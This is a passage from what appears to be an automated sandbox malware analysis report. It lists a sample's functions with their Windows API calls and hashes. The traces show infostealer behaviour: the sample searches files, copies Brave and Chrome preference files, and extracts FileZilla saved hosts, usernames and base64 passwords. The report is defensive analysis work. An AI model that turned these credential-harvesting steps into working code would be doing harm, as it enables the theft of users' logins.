                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: ea8ecec36efb8dcf8ca34e78b9b59c1b310bf7821d49f84b04cc982f308f5e86
                          • Instruction ID: 89082decf07d413865bd714b95cad300059a3b837d100de99a3d830dabc279d1
                          • Opcode Fuzzy Hash: ea8ecec36efb8dcf8ca34e78b9b59c1b310bf7821d49f84b04cc982f308f5e86
                          • Instruction Fuzzy Hash: 0C927D71A102069BCB20AFB9DD89AAF77B9AF44304F04553AF805B72D1DB78DC458FA4
                          Function 004118A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004118D2
                          • lstrlen.KERNEL32(\*.*), ref: 004118DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 004118FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0041190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00411947
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 00411967
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00411981
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004119BF
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004119F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00411A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411A4C
                          • lstrlen.KERNEL32(00431794), ref: 00411A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411A80
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411AB4
                          • lstrlen.KERNEL32(?), ref: 00411AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00411AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411B19
                          • lstrlen.KERNEL32(00FB8A10), ref: 00411B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411B8F
                          • lstrlen.KERNEL32(00431794), ref: 00411BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411BC3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411C57
                          • lstrlen.KERNEL32(00431794), ref: 00411C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411C8B
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411D21
                          • lstrlen.KERNEL32(00431794), ref: 00411D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411D55
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00411DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411DED
                          • lstrlen.KERNEL32(00431794), ref: 00411E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411E36
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411E68
                          • lstrlen.KERNEL32(00FBCF50), ref: 00411E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411EB2
                          • lstrlen.KERNEL32(00431794), ref: 00411EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411EE3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411F15
                          • lstrlen.KERNEL32(00FBD728), ref: 00411F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411F5F
                          • lstrlen.KERNEL32(00431794), ref: 00411F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411F90
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00411F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00411FC2
                          • lstrlen.KERNEL32(00FAB310), ref: 00411FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412036
                          • lstrlen.KERNEL32(00431794), ref: 00412048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412067
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00412073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412098
                          • lstrlen.KERNEL32(?), ref: 004120AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004120D0
                          • lstrcat.KERNEL32(00000000,?), ref: 004120DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412103
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041213F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0041214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00412176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00412181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: 4ce771d22f91469fb80aa1fc91939a485c3ea60ca114c77d5d502a966bb14593
                          • Instruction ID: 9cc103bb8bd8c0fc6ef5c51ef965a1b5fb9a92b33cadedd001fd5aa1bfe9e977
                          • Opcode Fuzzy Hash: 4ce771d22f91469fb80aa1fc91939a485c3ea60ca114c77d5d502a966bb14593
                          • Instruction Fuzzy Hash: 3162B7306116169BCB21AF75DD48AEF77BAAF44704F04012AF905E32A0DBBCDD45CBA8
                          Function 00413910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0041392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00413943
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041396C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 00413986
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004139BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 004139E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004139F2
                          • lstrlen.KERNEL32(00431794), ref: 004139FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413A1A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413A26
                          • lstrlen.KERNEL32(?), ref: 00413A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00413A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413A8A
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00413ACE
                          • lstrlen.KERNEL32(?), ref: 00413AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B36
                          • lstrlen.KERNEL32(00431794), ref: 00413B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B6A
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413B9E
                          • lstrlen.KERNEL32(?), ref: 00413BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00413BE0
                          • lstrlen.KERNEL32(00FB8B30), ref: 00413C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413C3C
                          • lstrlen.KERNEL32(00FB8A10), ref: 00413C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413CB7
                          • lstrlen.KERNEL32(00431794), ref: 00413CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413CE8
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00413D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413D79
                          • lstrlen.KERNEL32(00431794), ref: 00413D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413DAD
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413E43
                          • lstrlen.KERNEL32(00431794), ref: 00413E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413E77
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00413EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413F0D
                          • lstrlen.KERNEL32(00431794), ref: 00413F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413F41
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00413F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413F75
                          • lstrlen.KERNEL32(?), ref: 00413F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00413FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00413FE0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041401F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0041402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004140CE
                          • lstrcat.KERNEL32(00000000), ref: 004140DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 004142D9
                          • FindClose.KERNEL32(00000000), ref: 004142E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 8ca520b053c92cd98528fe744200d4efe85e3513570d007cb1c607061484f78c
                          • Instruction ID: 165d9e09db27d37c9d1f329b21ddaa26429c0bab99b0da1754f27d60a1fad692
                          • Opcode Fuzzy Hash: 8ca520b053c92cd98528fe744200d4efe85e3513570d007cb1c607061484f78c
                          • Instruction Fuzzy Hash: 61629171A106169BCB21AF79DD4CAEF77BAAF44305F04412AF805A3290DB78DD45CFA8
                          Function 00416960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004169C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00416A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00416A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00416AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00416B35
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416B9D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 2c508ab333171e5fa11f20666f870d2779ef429567be97f149c8f21ba4681bd9
                          • Instruction ID: c10cf898676c80c510ce13e0c370cb3e62b6153e8c8c123d5eee7de8961415cb
                          • Opcode Fuzzy Hash: 2c508ab333171e5fa11f20666f870d2779ef429567be97f149c8f21ba4681bd9
                          • Instruction Fuzzy Hash: 0F42C270B00215ABCB11ABB5DD89BEF777AAF04704F15542AF801E7291DBB8D941CFA8
                          Function 0040DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DBEF
                          • lstrlen.KERNEL32(00434CA8), ref: 0040DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC17
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 0040DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DC4C
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DC8F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0040DCD0
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0040DCF0
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0040DD0A
                          • lstrlen.KERNEL32(0042CFEC), ref: 0040DD1D
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DD7B
                          • lstrlen.KERNEL32(00431794), ref: 0040DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDA3
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DDAF
                          • lstrlen.KERNEL32(?), ref: 0040DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0040DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DE19
                          • lstrlen.KERNEL32(00431794), ref: 0040DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DE6F
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DE7B
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DEBB
                          • lstrlen.KERNEL32(00431794), ref: 0040DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040DEE6
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DEF2
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFA5
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040DFB1
                          • lstrlen.KERNEL32(00FB89D0), ref: 0040DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040DFF4
                          • lstrlen.KERNEL32(00431794), ref: 0040DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E022
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040E02E
                          • lstrlen.KERNEL32(00FB8A50), ref: 0040E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0040E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040E0E7
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E11F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0040E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E19F
                          • lstrcat.KERNEL32(00000000), ref: 0040E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0040E1F9
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040E22F
                          • lstrlen.KERNEL32(00FB8B30), ref: 0040E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040E261
                          • lstrcat.KERNEL32(00000000,00FB8B30), ref: 0040E269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040E988
                          • FindClose.KERNEL32(00000000), ref: 0040E997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: 5db075929d16c61b5c53cc914961670529be8a7a5d4f5222b3d3c395255468e3
                          • Instruction ID: 2b9d354d71d61b3b1f17fedc15f500068f23a244b4b65c85bf41effa755d8327
                          • Opcode Fuzzy Hash: 5db075929d16c61b5c53cc914961670529be8a7a5d4f5222b3d3c395255468e3
                          • Instruction Fuzzy Hash: A4526E71A102069BCB21AFB9DD89AAF77B9AF44304F04553AF805B72D1DB78DC058FA4
                          Function 004060D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 004060FF
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406152
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406185
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004061B5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004061F0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
